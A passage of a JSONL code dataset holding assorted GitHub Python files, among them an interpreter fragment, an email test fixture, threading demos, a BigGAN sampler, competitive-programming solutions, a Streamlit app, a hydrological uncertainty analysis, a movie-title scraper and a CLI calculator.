< 0 or valueArg1 > 49: exit(57)\n exit(valueArg1)\n \n # **** Debugging instructions ****\n # DPRINT - prints the specified value to standard error output\n elif insOpCode == 'DPRINT':\n if typeArg1 == 'VAR':\n typeArg1 = varList[valueArg1][Var.TYPE]\n valueArg1 = varList[valueArg1][Var.VALUE]\n if valueArg1 == None : exit(56)\n print(valueArg1, file = sys.stderr)\n \n # BREAK\n elif insOpCode == 'BREAK':\n print(\"Předpokládá se, že na standardní chybový výstup vypíše stav interpretu.\" , file = sys.stderr)\n\n insNum = insNum + 1;\n","repo_name":"AveAvatar/vutfit-ipp","sub_path":"project2/interpret.py","file_name":"interpret.py","file_ext":"py","file_size_in_byte":26115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"27550319230","text":"import datetime\nfrom imap_tools import EmailAddress\n\nDATA = dict(\n subject='Saying Hello',\n from_='jdoe@machine.example',\n to=('mary@example.net',),\n cc=(),\n bcc=(),\n reply_to=(),\n date=datetime.datetime(1997, 11, 21, 9, 55, 6, tzinfo=datetime.timezone.utc),\n date_str='21 Nov 97 09:55:06 GMT',\n text='This is a message just to say hello.\\r\\nSo, \"Hello\".\\r\\n',\n html='',\n headers={'from': ('John Doe ',), 'to': ('Mary Smith ',), 'subject': ('Saying Hello',), 'date': ('21 Nov 97 09:55:06 GMT',), 'message-id': ('<1234@local.machine.example>',)},\n attachments=[],\n from_values=EmailAddress(name='John Doe', email='jdoe@machine.example'),\n to_values=(EmailAddress(name='Mary Smith', email='mary@example.net'),),\n cc_values=(),\n bcc_values=(),\n reply_to_values=(),\n)","repo_name":"ikvk/imap_tools","sub_path":"tests/messages_data/rfc2822/example12.py","file_name":"example12.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":608,"dataset":"github-code","pt":"36"} +{"seq_id":"29721377783","text":"# from threading import Thread\n# from time import sleep\n# import time\n\n\n# # class MyClass(Thread):\n# # def __init__(self, tName, tTime, tCounter):\n# # Thread.__init__(self)\n# # self.tName = tName\n# # self.tTime = tTime\n# # self.tCounter = tCounter\n# #\n# # def run(self):\n# # print(\"Strating {}\".format(self.tName))\n# # self.myPrint(self.tTime, self.tTime, self.tCounter)\n# # print(\"Ending {}\".format(self.tName))\n# #\n# # def myPrint(self, tName, tTime, counter):\n# # while counter:\n# # print(\"{} : {}\".format(tName, time.ctime()))\n# # sleep(tTime)\n# # counter-=1\n# #\n# # t1 = MyClass(\"Thread 1\", 1, 
5)\n# # t2 = MyClass(\"Thread 2\", 2, 5)\n# #\n# # t1.start()\n# # t2.start()\n# #\n# # t1.join()\n# # t2.join()\n# # print(\"Ending main thread\")\n\n\n# class MyClass():\n# def __init__(self, tName, tTime, tCounter):\n# self.tName = tName\n# self.tTime = tTime\n# self.tCounter = tCounter\n\n# def run(self):\n# print(\"Strating {}\".format(self.tName))\n# self.myPrint(self.tTime, self.tTime, self.tCounter)\n# print(\"Ending {}\".format(self.tName))\n\n# def myPrint(self, tName, tTime, counter):\n# while counter:\n# print(\"{} : {}\".format(tName, time.ctime()))\n# sleep(tTime)\n# counter-=1\n\n# t1 = MyClass(\"Thread 1\", 1, 5)\n# t2 = MyClass(\"Thread 2\", 2, 5)\n\n# t1.run()\n# t2.run()\n\n# print(\"Ending main thread\")\n\n\n\n# \"\"\"\n# Output :\n\n# Strating Thread 1\n# 1 : Wed Dec 22 14:11:36 2021\n# 1 : Wed Dec 22 14:11:37 2021\n# 1 : Wed Dec 22 14:11:38 2021\n# 1 : Wed Dec 22 14:11:39 2021\n# 1 : Wed Dec 22 14:11:40 2021\n# Ending Thread 1\n# Strating Thread 2\n# 2 : Wed Dec 22 14:11:41 2021\n# 2 : Wed Dec 22 14:11:43 2021\n# 2 : Wed Dec 22 14:11:45 2021\n# 2 : Wed Dec 22 14:11:47 2021\n# 2 : Wed Dec 22 14:11:49 2021\n# Ending Thread 2\n# Ending main thread\n# \"\"\"\n\n\n###..................................................................\n\n\n## Python program to illustrate the concept of threading, importing the threading module\n\n# import threading\n\n# def print_cube(num):\n# \t\"\"\"\n# \tfunction to print cube of given num\n# \t\"\"\"\n# \tprint(\"Cube: {}\".format(num * num * num))\n\n# def print_square(num):\n# \t\"\"\"\n# \tfunction to print square of given num\n# \t\"\"\"\n# \tprint(\"Square: {}\".format(num * num))\n\n# if __name__ == \"__main__\":\n# \t# creating thread\n# \tt1 = threading.Thread(target=print_square, args=(10,))\n# \tt2 = threading.Thread(target=print_cube, args=(10,))\n\n# \t# starting thread 1\n# \tt1.start()\n# \t# starting thread 2\n# \tt2.start()\n\n# \t# wait until thread 1 is completely executed\n# \tt1.join()\n# \t# wait until thread 2 is completely executed\n# \tt2.join()\n\n# \t# both threads completely executed\n# \tprint(\"Done!\")\n\n###..................................................................\n\n# Python program to illustrate the concept\n# of threading\nimport threading\nimport os\n\ndef task1():\n\tprint(\"Task 1 assigned to thread: {}\".format(threading.current_thread().name))\n\tprint(\"ID of process running task 1: {}\".format(os.getpid()))\n\ndef task2():\n\tprint(\"Task 2 assigned to thread: {}\".format(threading.current_thread().name))\n\tprint(\"ID of process running task 2: {}\".format(os.getpid()))\n\nif __name__ == \"__main__\":\n\n\t# print ID of current process\n\tprint(\"ID of process running main program: {}\".format(os.getpid()))\n\n\t# print name of main thread\n\tprint(\"Main thread name: {}\".format(threading.current_thread().name))\n\n\t# creating threads\n\tt1 = threading.Thread(target=task1, name='t1')\n\tt2 = threading.Thread(target=task2, name='t2')\n\n\t# starting threads\n\tt1.start()\n\tt2.start()\n\n\t# wait until all threads finish\n\tt1.join()\n\tt2.join()\n\n\"\"\"\noutput :\nID of process running main program: 10216\nMain thread name: MainThread\nTask 1 assigned to thread: t1\nID of process running task 1: 10216\nTask 2 assigned to thread: t2\nID of process running task 2: 10216\n\n\"\"\"\n\n###..................................................................\n\n","repo_name":"mohitnamdev102/python","sub_path":"Python (Utsav Patel)/22_Multi Threading.py","file_name":"22_Multi 
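
The hand-built start/join choreography in the threading demo above is what `concurrent.futures` packages up; an equivalent sketch:

```python
# Same start/join pattern via a pool: submit() schedules the calls and the
# context manager joins all workers on exit.
from concurrent.futures import ThreadPoolExecutor
import os
import threading

def task(name):
    print(f"{name} on thread {threading.current_thread().name}, pid {os.getpid()}")

with ThreadPoolExecutor(max_workers=2) as pool:
    pool.submit(task, "Task 1")
    pool.submit(task, "Task 2")
print("Done!")
```
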
Threading.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"36049807222","text":"\n\"\"\" Notorious FRC brushed motor, the CIM. Parameters hodge-podged from various Chief Delphi threads.\"\"\"\ncim = {\n 'kr': 0.0185, # Torque/back-EMF constant (N-m/A) or (V-s/rad)\n 'Ra': 0.091, # Armature resistance (ohm)\n 'La': 59e-6, # Armature inductance (H)\n 'Jr': 0.000075, # Motor inertia (kg-m^2)\n 'B': 9e-5, # Motor damping coefficient (N-m-s/rad)\n 'Tl': 0, # Load torque\n 'Tf': 0.05 # Dry friction torque\n}","repo_name":"nathnkim/MotorSimulation","sub_path":"bigmmac/motorparams.py","file_name":"motorparams.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"9535477844","text":"import BigGAN\nimport numpy as np\nimport sys\n\nfrom torchvision.utils import save_image\nfrom utils import *\n\n\ndef main():\n # Set up cudnn.benchmark for free speed.\n torch.backends.cudnn.benchmark = True\n device = \"cuda:0\"\n\n print(\"Loading the BigGAN generator model...\", flush=True)\n resolution = 256\n config = get_config(resolution)\n G = BigGAN.Generator(**config)\n G.load_state_dict(\n torch.load(\"pretrained_weights/biggan_256_weights.pth\"), strict=False\n )\n G = nn.DataParallel(G).to(device)\n G.eval()\n\n data_source = sys.argv[1] # \"imagenet\" or \"places\".\n target = sys.argv[2] # Filename found in \"imagenet\" or \"places\" directory.\n class_embedding = np.load(f\"{data_source}/{target}.npy\")\n class_embedding = torch.tensor(class_embedding)\n\n z_num = 16\n repeat_class_embedding = class_embedding.repeat(z_num, 1).to(device)\n zs = torch.randn((z_num, dim_z_dict[resolution]), requires_grad=False).to(device)\n\n gan_images_tensor = G(zs, repeat_class_embedding)\n\n save_dir = \"samples\"\n print(f\"Saving class embedding samples in {save_dir}.\", flush=True)\n os.makedirs(save_dir, exist_ok=True)\n final_image_path = f\"{save_dir}/{data_source}_{target}.jpg\"\n save_image(gan_images_tensor, final_image_path, normalize=True, nrow=4)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"qilimk/biggan-am","sub_path":"sample_biggan_am_embedding.py","file_name":"sample_biggan_am_embedding.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"36"} +{"seq_id":"37502407227","text":"# https://www.acmicpc.net/problem/3649\nimport sys\ninput = sys.stdin.readline\n\nwhile True:\n try:\n x = int(input().strip()) * 10000000\n except:\n break\n n = int(input().strip())\n swi = False\n if n == 0: \n print('danger')\n continue\n a = []\n for _ in range(n):\n a.append(int(input()))\n a.sort()\n p1 = 0\n p2 = n - 1\n while p1 != p2:\n s = a[p1] + a[p2]\n if x == s:\n print(f'yes {a[p1]} {a[p2]}')\n swi = True\n break\n elif x < s:\n p2 -= 1\n else:\n p1 += 1\n if not swi:\n print('danger')","repo_name":"junsgi/Algorithm","sub_path":"Binary_Search/로봇 프로젝트.py","file_name":"로봇 프로젝트.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"27611807248","text":"import sys\n\nsys.setrecursionlimit(10 ** 6)\ninput = sys.stdin.readline\n\n\ndef quickSort(left, right):\n if left >= right:\n return\n l = left\n r = right\n mid = arr[(l + r) // 2]\n while True:\n while arr[l] < mid:\n l += 1\n while arr[r] > mid:\n r -= 1\n if l >= 
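
The pair-sum solver above (로봇 프로젝트) scans a sorted list from both ends; the generic form of that two-pointer step:

```python
def find_pair(sorted_vals, target):
    """Return a pair summing to target from a sorted list, or None."""
    lo, hi = 0, len(sorted_vals) - 1
    while lo < hi:
        s = sorted_vals[lo] + sorted_vals[hi]
        if s == target:
            return sorted_vals[lo], sorted_vals[hi]
        if s < target:
            lo += 1        # sum too small: advance the left pointer
        else:
            hi -= 1        # sum too large: retreat the right pointer
    return None

print(find_pair([1, 3, 5, 8, 11], 13))   # (5, 8)
```
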
r:\n break\n temp = arr[l]\n arr[l] = arr[r]\n arr[r] = temp\n quickSort(left, l - 1)\n quickSort(r + 1, right)\n\n\nn = int(input().strip())\narr = list()\nfor i in range(n):\n arr.append(int(input().strip()))\nquickSort(0, n - 1)\nprint('\\n'.join(str(x) for x in arr))","repo_name":"huisam/JinLearnedList","sub_path":"Algorithm/baekjoon/python/2751_수정렬하기2.py","file_name":"2751_수정렬하기2.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"36985074433","text":"import streamlit as st\nfrom PIL import Image\n\nst.title(\"miau de pablitus03\")\n\nst.header (\"aqui comienza mi historia\")\nst.write (\"confio en que puuedo entender\")\nimage = Image.open('nyan_cat.jpg')\n\nst.image(image, caption= 'interfaces')\n\ntexto =st.text_input('eres libre de escribir','mia mie mii mio miu')\nst.write( 'el texto es', texto)\n\nst.subheader (\"xX .......... vienen 2 columnas .......... Xx\")\n\ncol1, col2 = st.columns(2)\n\nwith col1:\n st.subheader (\"soy la primera\")\n st.write(\"si soy la primera\")\n resp = st.checkbox ('de acuerdo')\n if resp:\n st.write('sip')\n\nwith col2:\n st.subheader (\"this is the remix\")\n modo = st.radio (\"tu interfaz es\", ('visual','auditiva','touch'))\n if modo == 'visual':\n st.write (\" menos mal, ya me preocuparia si escribieras sin ver\")\n \n if modo == 'auditiva':\n st.write (\"tenemos orejas que alegria\")\n \n if modo == 'touch':\n st.write (\" ve a abrasar un arbol, llevas mucho aqui sentado\")\n\nst.subheader (\"NOOOOO,MIS BOTONES DE GOMITA\")\nif st.button ('press start'):\n st.write ('player n1, ready')\n\nelse:\n st.write ('exit?')\n\nst.subheader(\"hoy quiero...\")\nin_mod = st.selectbox(\n \" que llevas el dia de hoy\",\n (\"pizza\",\"anvorguesa\",\"niños con queso y tocineta\"),\n)\n\nif in_mod == \"pizza\":\n set_mod = \"en la michi pizzeria todo se amaza a patita\"\n\nelif in_mod == \"anvorguesa\":\n set_mod = \" para pa pa paaaaa\"\n\nelif in_mod == \"niños con queso y tocineta\":\n set_mod = \"sale un niño especialllll\"\n\nst.write (\" 3, 2, 1\", set_mod)\n\nwith st.sidebar:\n st.subheader (\"configuara el termino\")\n mod_radio = st.radio(\n \"escoge tu color\",\n ('rosadito', 'cafe','mejor pide un carbon')\n )\n","repo_name":"pablitus03/clase-introduccion","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"89018452","text":"import warnings\r\nimport pandas as pd\r\nimport numpy as np\r\nimport os\r\nfrom utility import print_progress_bar\r\nfrom utility import nash, nancorr, pbias\r\nfrom configobj import ConfigObj\r\n\r\nwarnings.filterwarnings('ignore')\r\nprint('/014')\r\n\r\n\r\ndef get_configuration(is_grazing, field):\r\n if is_grazing:\r\n scenario = 'pyAPEX_g'\r\n else:\r\n scenario = 'pyAPEX_n'\r\n file_config = f'../{field}/{scenario}/pyAPEX/runtime.ini'\r\n config = ConfigObj(file_config)\r\n return config\r\n\r\n\r\ndef get_measure(data_dir, file_name):\r\n file_name = os.path.join(data_dir, file_name)\r\n df_data = pd.read_csv(file_name)\r\n date_vec = []\r\n ndata = df_data.shape[0]\r\n for i in range(ndata):\r\n date_vec.append(pd.to_datetime(f'{df_data.Year[i]}-{df_data.Month[i]}-{df_data.Day[i]}'))\r\n df_data.Date = date_vec\r\n df_data.index = df_data.Date\r\n df_data = df_data[['Date', 'Year', 'Month', 'Day', 'runoff (mm)', 'sediment (kg)']]\r\n df_data.columns = ['Date', 'Year', 'Month', 
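
`get_measure` above assembles its date index with a per-row Python loop; pandas can build it in one vectorized call from the Year/Month/Day columns:

```python
# Vectorized replacement for the date loop in get_measure().
import pandas as pd

df = pd.DataFrame({'Year': [2010, 2010], 'Month': [1, 1],
                   'Day': [1, 2], 'runoff (mm)': [0.0, 1.2]})
# to_datetime() accepts a frame with year/month/day columns
df['Date'] = pd.to_datetime(df[['Year', 'Month', 'Day']].rename(columns=str.lower))
df = df.set_index('Date')
print(df.index)
```
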
'Day', 'runoff', 'sediment']\r\n return df_data\r\n\r\n\r\ndef partition_data(df_obs, obs_attribute, df_mod, mod_attribute, years_warm_up=4, cal_year=11):\r\n try:\r\n year_start = df_mod.Y[0]\r\n cal_start = year_start + years_warm_up\r\n cal_end = cal_start + cal_year\r\n val_end = df_obs.Year[-1]\r\n df_obs_cal = df_obs[(df_obs.Year >= cal_start) & (df_obs.Year <= cal_end)]\r\n df_obs_val = df_obs[(df_obs.Year > cal_end) & (df_obs.Year <= val_end)]\r\n df_model_cal_data = df_mod[(df_mod.Y >= cal_start) & (df_mod.Y <= cal_end)]\r\n df_model_val_data = df_mod[(df_mod.Y > cal_end) & (df_mod.Y <= val_end)]\r\n df_cal = pd.concat([df_obs_cal[obs_attribute], df_model_cal_data[mod_attribute]], axis=1)\r\n df_cal.columns = ['Observed', 'Modeled']\r\n df_val = pd.concat([df_obs_val[obs_attribute], df_model_val_data[mod_attribute]], axis=1)\r\n df_val.columns = ['Observed', 'Modeled']\r\n except Exception as e:\r\n print(e)\r\n print('File is empty')\r\n return np.nan, np.nan\r\n return df_cal, df_val\r\n\r\n\r\ndef get_file_name(run_id, is_grazing, field, location):\r\n if is_grazing:\r\n scenario = 'pyAPEX_g'\r\n else:\r\n scenario = 'pyAPEX_n'\r\n file_loc = f'../{field}/{scenario}/pyAPEX/OutputUncertainty/'\r\n if (location == 'basin') | (location == 'outlet'):\r\n file_read = f'daily_{location}_{run_id:07}.csv.csv'\r\n else:\r\n file_read = f'{location}_{run_id:07}.csv'\r\n return file_loc + file_read\r\n\r\n\r\ndef read_model_output(file, attribute):\r\n data_read = pd.read_csv(file)\r\n df = data_read[['Date', 'Y', 'M', 'D', attribute]]\r\n df.index = df.Date\r\n df = df.drop('Date', axis=1)\r\n df.index = pd.to_datetime(df.index)\r\n return df\r\n\r\n\r\ndef read_measured(field, is_grazing, file):\r\n if is_grazing:\r\n scenario = 'pyAPEX_g'\r\n else:\r\n scenario = 'pyAPEX_n'\r\n obs_path = f'../{field}/{scenario}/pyAPEX/Program/'\r\n df = get_measure(obs_path, file)\r\n df = df.drop('Date', axis=1)\r\n df.index = pd.to_datetime(df.index)\r\n return df\r\n\r\n\r\ndef get_glue(field, is_grazing):\r\n # configuration data\r\n config = get_configuration(is_grazing=is_grazing, field=field)\r\n file_observe = config['file_observe']\r\n max_un, step = int(config['max_range_uncertaintity']), float(config['increment_uncertainty'])\r\n range_vec = np.arange(-max_un, max_un + step, step)\r\n n_sim = len(range_vec)\r\n # read measured data\r\n df_obs = read_measured(field=field, is_grazing=is_grazing, file=file_observe)\r\n MSE_vec = []\r\n NSE_vec = []\r\n COD_vec = []\r\n PBIAS_vec = []\r\n range_set = []\r\n likelihood_mse_year_mat = pd.DataFrame()\r\n likelihood_nse_year_mat = pd.DataFrame()\r\n likelihood_cod_year_mat = pd.DataFrame()\r\n likelihood_pbias_year_mat = pd.DataFrame()\r\n mse_year_mat = pd.DataFrame()\r\n cod_year_mat = pd.DataFrame()\r\n nse_year_mat = pd.DataFrame()\r\n pbias_year_mat = pd.DataFrame()\r\n # for run in range(4119, 4123):\r\n print_progress_bar(0, n_sim, prefix='', suffix='', decimals=1, length=100, fill='█')\r\n for run in range(n_sim):\r\n # read model output\r\n file_path = get_file_name(run_id=run + 1, is_grazing=is_grazing, field=field, location='outlet')\r\n df_mod = read_model_output(file=file_path, attribute='WYLD')\r\n # merge and separate measurement and simulated data\r\n df_cal, df_val = partition_data(df_obs, obs_attribute='runoff', df_mod=df_mod, mod_attribute='WYLD',\r\n years_warm_up=4,\r\n cal_year=11)\r\n try:\r\n df_val = df_val.dropna()\r\n df_data = pd.concat([df_cal, df_val], axis=0)\r\n df_data.insert(0, 'Year', df_data.index.year)\r\n\r\n # 
calculate yearly MSE\r\n year_vec = df_data.Year.unique()\r\n mse_vec_year = []\r\n nse_vec_year = []\r\n cod_vec_year = []\r\n pbias_vec_year = []\r\n for year in year_vec:\r\n data_year = df_data[df_data.Year == year]\r\n X, Y = data_year.Observed.values, data_year.Modeled.values\r\n MSE = np.sum((X - Y) ** 2) / len(X)\r\n mse_vec_year.append(MSE)\r\n nse_vec_year.append(nash(X, Y))\r\n cod_vec_year.append(nancorr(X, Y))\r\n pbias_vec_year.append(np.abs(pbias(X, Y)))\r\n del MSE, X, Y\r\n # calculating annual likelihood; each metric is scaled by its own best value\r\n L_theta_mse_vec_year = []\r\n L_theta_nse_vec_year = []\r\n L_theta_cod_vec_year = []\r\n L_theta_pbias_vec_year = []\r\n for j in range(len(year_vec)):\r\n L_theta_mse_vec_year.append(np.exp(-mse_vec_year[j] / np.min(mse_vec_year)))\r\n L_theta_nse_vec_year.append(np.exp(-nse_vec_year[j] / np.max(nse_vec_year)))\r\n L_theta_cod_vec_year.append(np.exp(-cod_vec_year[j] / np.max(cod_vec_year)))\r\n L_theta_pbias_vec_year.append(np.exp(-pbias_vec_year[j] / np.min(pbias_vec_year)))\r\n df_mse = pd.DataFrame(mse_vec_year, index=year_vec)\r\n df_nse = pd.DataFrame(nse_vec_year, index=year_vec)\r\n df_cod = pd.DataFrame(cod_vec_year, index=year_vec)\r\n df_pbias = pd.DataFrame(pbias_vec_year, index=year_vec)\r\n df_mse.columns, df_nse.columns = [str(run + 1)], [str(run + 1)]\r\n df_cod.columns, df_pbias.columns = [str(run + 1)], [str(run + 1)]\r\n mse_year_mat = pd.concat([mse_year_mat, df_mse], axis=1)\r\n nse_year_mat = pd.concat([nse_year_mat, df_nse], axis=1)\r\n cod_year_mat = pd.concat([cod_year_mat, df_cod], axis=1)\r\n pbias_year_mat = pd.concat([pbias_year_mat, df_pbias], axis=1)\r\n df_Likelihood_mse = pd.DataFrame(L_theta_mse_vec_year, index=year_vec)\r\n df_Likelihood_nse = pd.DataFrame(L_theta_nse_vec_year, index=year_vec)\r\n df_Likelihood_cod = pd.DataFrame(L_theta_cod_vec_year, index=year_vec)\r\n df_Likelihood_pbias = pd.DataFrame(L_theta_pbias_vec_year, index=year_vec)\r\n df_Likelihood_mse.columns, df_Likelihood_nse.columns = [str(run + 1)], [str(run + 1)]\r\n df_Likelihood_cod.columns, df_Likelihood_pbias.columns = [str(run + 1)], [str(run + 1)]\r\n likelihood_mse_year_mat = pd.concat([likelihood_mse_year_mat, df_Likelihood_mse], axis=1)\r\n likelihood_nse_year_mat = pd.concat([likelihood_nse_year_mat, df_Likelihood_nse], axis=1)\r\n likelihood_cod_year_mat = pd.concat([likelihood_cod_year_mat, df_Likelihood_cod], axis=1)\r\n likelihood_pbias_year_mat = pd.concat([likelihood_pbias_year_mat, df_Likelihood_pbias], axis=1)\r\n # calculate MSE over the simulation period\r\n X, Y = df_data.Observed.values, df_data.Modeled.values\r\n MSE_vec.append(np.sum((X - Y) ** 2) / len(X))\r\n NSE_vec.append(nash(X, Y))\r\n COD_vec.append(nancorr(X, Y))\r\n PBIAS_vec.append(np.abs(pbias(X, Y)))\r\n range_set.append(range_vec[run])\r\n # print(f'processing {run + 1}')\r\n print_progress_bar(run, n_sim, prefix=f'{run+1}', suffix='', decimals=1, length=100, fill='█')\r\n except Exception as e:\r\n print(e)\r\n continue\r\n\r\n if is_grazing:\r\n idx = 'g'\r\n else:\r\n idx = 'n'\r\n mse_year_mat.to_csv(f'../post_analysis/Results/{field}_{idx}_Uncertainty_annual_mse.csv')\r\n nse_year_mat.to_csv(f'../post_analysis/Results/{field}_{idx}_Uncertainty_annual_nse.csv')\r\n cod_year_mat.to_csv(f'../post_analysis/Results/{field}_{idx}_Uncertainty_annual_cod.csv')\r\n pbias_year_mat.to_csv(f'../post_analysis/Results/{field}_{idx}_Uncertainty_annual_pbias.csv')\r\n likelihood_mse_year_mat.to_csv(f'../post_analysis/Results/{field}_{idx}_Uncertainty_annual_likelihood_mse.csv')\r\n 
likelihood_nse_year_mat.to_csv(f'../post_analysis/Results/{field}_{idx}_Uncertainty_annual_likelihood_nse.csv')\r\n likelihood_cod_year_mat.to_csv(f'../post_analysis/Results/{field}_{idx}_Uncertainty_annual_likelihood_cod.csv')\r\n likelihood_pbias_year_mat.to_csv(f'../post_analysis/Results/{field}_{idx}_Uncertainty_annual_likelihood_pbias.csv')\r\n L_mse_Vec = []\r\n L_nse_Vec = []\r\n L_cod_Vec = []\r\n L_pbias_Vec = []\r\n for i in range(len(MSE_vec)):\r\n L_mse_Vec.append(np.exp(-MSE_vec[i] / np.nanmin(MSE_vec)))\r\n L_nse_Vec.append(np.exp(-NSE_vec[i] / np.nanmax(NSE_vec)))\r\n L_cod_Vec.append(np.exp(-COD_vec[i] / np.nanmax(COD_vec)))\r\n L_pbias_Vec.append(np.exp(-PBIAS_vec[i] / np.nanmin(PBIAS_vec)))\r\n df_out = pd.DataFrame({'Percent': range_set, 'MSE': MSE_vec, 'Likelihood_MSE': L_mse_Vec, 'NSE': NSE_vec,\r\n 'Likelihood_NSE': L_nse_Vec, 'COD': COD_vec,\r\n 'Likelihood_COD': L_cod_Vec, 'PBIAS': PBIAS_vec, 'Likelihood_PBIAS': L_pbias_Vec})\r\n df_out.to_csv(f'../post_analysis/Results/{field}_{idx}_Uncertainty_range.csv')\r\n\r\n\r\nget_glue(field='Farm_1', is_grazing=False)\r\nget_glue(field='Farm_1', is_grazing=True)\r\nget_glue(field='Farm_8', is_grazing=False)\r\nget_glue(field='Farm_8', is_grazing=True)\r\n","repo_name":"mlmaskey/pyAPEXSCU","sub_path":"post_scripts/summarize.uncertainty.loglikelihood.py","file_name":"summarize.uncertainty.loglikelihood.py","file_ext":"py","file_size_in_byte":10234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"33569541083","text":"\"\"\"\n Author: 倪媛 (Ni Yuan)\n Purpose: scrape the Douban Top 250 movie data\n Date: 22/10/2018\n\"\"\"\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef main():\n \"\"\"\n Main function\n \"\"\"\n for i in range(10):\n # Page through the results by adding 25 to the start= part of the url each loop\n url = 'https://movie.douban.com/top250?start=' + str(25*i)\n # Open the connection\n r = requests.get(url, timeout=30)\n # Parse the HTML into a soup object\n soup = BeautifulSoup(r.text, 'lxml')\n # Find the list of title blocks\n title_list = soup.find_all('div', {'class': 'hd'})\n # Loop over each element and pull out the actual title\n for title in title_list:\n # Only returns the first matching tag\n # title_name = title.a.span.text.strip()\n title_name = title.find('span', {'class': 'title'}).text.strip()\n print(title_name)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"CeciliaNi/PythonScraping","sub_path":"lect03_movie_top250.py","file_name":"lect03_movie_top250.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"36"} +{"seq_id":"24201500413","text":"# Baekjoon 16235 - Tree Reinvestment\n\nimport sys\n\nN, M, K = map(int, sys.stdin.readline().split(' '))\n\nA = [[0 for _ in range(N + 1)] for _ in range(N + 1)] # nutrients added each winter\nland = [[5 for _ in range(N + 1)] for _ in range(N + 1)] # nutrients currently in the ground\ntrees = [[[] for _ in range(N + 1)] for _ in range(N + 1)] # tree ages per cell\n\nfor i in range(N):\n line = list(map(int, sys.stdin.readline().split(' ')))\n for j in range(N):\n A[i + 1][j + 1] = line[j]\n\nfor _ in range(M):\n x, y, z = map(int, sys.stdin.readline().split(' '))\n trees[x][y].append(z)\n\n\ndef spring_and_summer():\n for r in range(1, N + 1):\n for c in range(1, N + 1):\n if trees[r][c]:\n\n trees[r][c].sort()\n dead = []\n alive = []\n for tree in trees[r][c]:\n\n if land[r][c] < tree:\n dead.append(tree)\n else:\n land[r][c] -= tree\n alive.append(tree+1)\n\n trees[r][c] = alive[:]\n for _tree in dead:\n land[r][c] += _tree // 2\n\n\ndef fall():\n dirs = ((-1, -1), (-1, 0), (-1, 1), (0, -1), (0, 1), (1, -1), (1, 0), (1, 1))\n for r in range(1, N + 1):\n for c in range(1, N + 1):\n for tree in 
trees[r][c]:\n if tree % 5 == 0:\n for i, j in dirs:\n if 0 < r + i <= N and 0 < c + j <= N:\n trees[r + i][c + j].append(1)\n\n\ndef winter():\n for r in range(1, N + 1):\n for c in range(1, N + 1):\n land[r][c] += A[r][c]\n\n\ndef count_tree():\n cnt = 0\n for r in range(1, N + 1):\n for c in range(1, N + 1):\n cnt += len(trees[r][c])\n return cnt\n\n\nfor _ in range(K):\n spring_and_summer()\n fall()\n winter()\n\nprint(count_tree())\n\n","repo_name":"superyodi/burning-algorithm","sub_path":"samsung/boj_16235.py","file_name":"boj_16235.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"30095653563","text":"import json\nimport os.path\nimport codecs\n\n\nfrom sampledata.exceptions import ParameterError\n\nLOCALES = ['es', 'us']\nCITIES_PATH = os.path.join(os.path.dirname(__file__), 'cities')\n\n\nclass City(object):\n data = {}\n\n def __load_locale(self, locale):\n locale_path = os.path.join(CITIES_PATH, \"{0}.json\".format(locale))\n if not os.path.exists(locale_path):\n raise ParameterError('Not valid locale')\n\n fd = codecs.open(locale_path, 'r', encoding='utf-8')\n City.data[locale] = json.load(fd)\n fd.close()\n\n def get_cities(self, locale):\n if locale not in City.data:\n self.__load_locale(locale)\n\n return [x for x in City.data[locale]['cities']]\n\n def all_cities(self):\n cities = []\n for locale in LOCALES:\n cities += self.get_cities(locale)\n\n return cities\n\n def generate(self, sd, locale=None):\n if locale:\n cities = self.get_cities(locale)\n else:\n cities = self.all_cities()\n\n return sd.choice(cities)\n","repo_name":"jespino/sampledata","sub_path":"sampledata/l10n/cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"36"} +{"seq_id":"4259917088","text":"import os\n\n\nOPTIONS = [\n 'Addition',\n 'Subtraction',\n 'Multiplication',\n 'Division',\n]\n\nFUNCTION = {\n 1: lambda a, b: a+b,\n 2: lambda a, b: a-b,\n 3: lambda a, b: a*b,\n 4: lambda a, b: a/b,\n}\n\n\ndef msg_error(msg, err=\"\"):\n print(msg, err)\n\n\nclass Calculator(object):\n\n def __init__(self):\n self.run()\n\n def run(self):\n\n while True:\n options = OPTIONS\n print(\"Calculator CLI\")\n for i in range(len(options)):\n print(i+1, \"-\", options[i])\n\n try:\n choice = int(input(\"Choose an option: \"))\n except ValueError:\n msg_error(\"[ERROR] Invalid Value\")\n continue # re-prompt instead of falling through with an unbound choice\n\n if choice < 1 or choice > len(options):\n msg_error(\"[ERROR] Invalid option\")\n continue\n\n self.choice_option(choice)\n\n def choice_option(self, x):\n os.system(\"clear\")\n options = OPTIONS\n\n try:\n func = FUNCTION[x]\n except KeyError as error:\n msg_error(\"[ERROR] Invalid option -\", error)\n return\n\n print(\"Selected Option - \", options[x-1])\n try:\n print(func(*self.value_number()))\n except ZeroDivisionError:\n msg_error(\"[ERROR] Division by zero\")\n\n def value_number(self):\n while True:\n try:\n a = float(input(\"Type 